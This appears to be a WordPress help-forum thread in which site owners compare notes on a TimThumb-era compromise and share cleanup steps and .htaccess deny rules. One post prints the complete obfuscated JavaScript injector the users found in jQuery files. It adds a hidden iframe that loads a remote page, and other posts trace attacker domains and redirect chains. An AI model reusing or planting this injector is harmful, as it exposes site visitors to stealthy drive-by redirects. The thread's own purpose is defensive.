Two Strange Errors

I filed a complaint at superpuperdomain.com’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended ??

I’m getting crap from superpuperdomain2.com

Did you add the .htaccess I suggested?

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

I also suggest you ban the IP and IP range from those domains. You can use the WP-Ban plugin for this, or any other plugin that works the same.

Hello all, like many of you, one of my site was affected by this crap…

But I’ve found something else after cleaning it, a little iframe, in a javascript (Obfuscated), in my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. `

var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

And it’s basically add an iframe going to : https://counter-wordpress.com/frame.php …. It’s obviously engineer to be stealth … As it’s not showing in your html source, and loaded by a wordpress JS, and is probably don’t do much at this moment (Probably in standby) ….

Anyone else have this ?

I have the files, but not the piece of code you are giving…..

Well, i’ve seen 2 other site who got this, after being affected by the PHPRemoteView via timthumb ….

Dang. Now I see that I have it to…

Elmo_is_evil

It did not occur in my case.

No guarantees, but you can check the dates of the files in your WordPress installation. Those infected are dated the day of infection.

I made a post in Portuguese, reporting on my case.

https://www.bdibbs.com.br/2011/falha-de-seguranca-no-timthumb

I checked out https://counter-wordpress.com/frame.php and it appears to load some scripts and then redirect to https://global-traff.com/tds/in.cgi?5&user=mexx and then to https://global-traff.com/tds/in.cgi?mexx and then to https://global-traff.com/tds/in.cgi?18 and then to https://global-traff.com/empity.html.

The frame.php appears to be the same script from superpuperdomain.com and superpuperdomain2.com.

After viewing the file once, it will always be blank (it probably stores your IP address and doesn’t load anything again afterward). I haven’t been able to pull the page back up to prevent the redirect and see exactly what it’s loading.

Cool info Mvied, i will check with one of my dynamic ip VPN …..

Thanks, Elmo_is_evil. Your earlier comment helped me track down the same thing on every WP installation on my server. ??

If you find this in any other files, please note it and I’ll do the same.

Update:

The same code was appended to any script in any directory that started with ‘jquery’. So, even old versions of jQuery in old plugins, like ‘jquery-1.3.2.min.js’ were affected.

Okay… Now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru….

It seems to be a lot more difficult to resolve ??

Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?

Found it, my .htacces file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.php

Delete your .htaccess file and make a new one.

These hackers also place phony files in your wordpress installation. Check your uploads directory and theme files for sm3.php and other files you don’t reconize.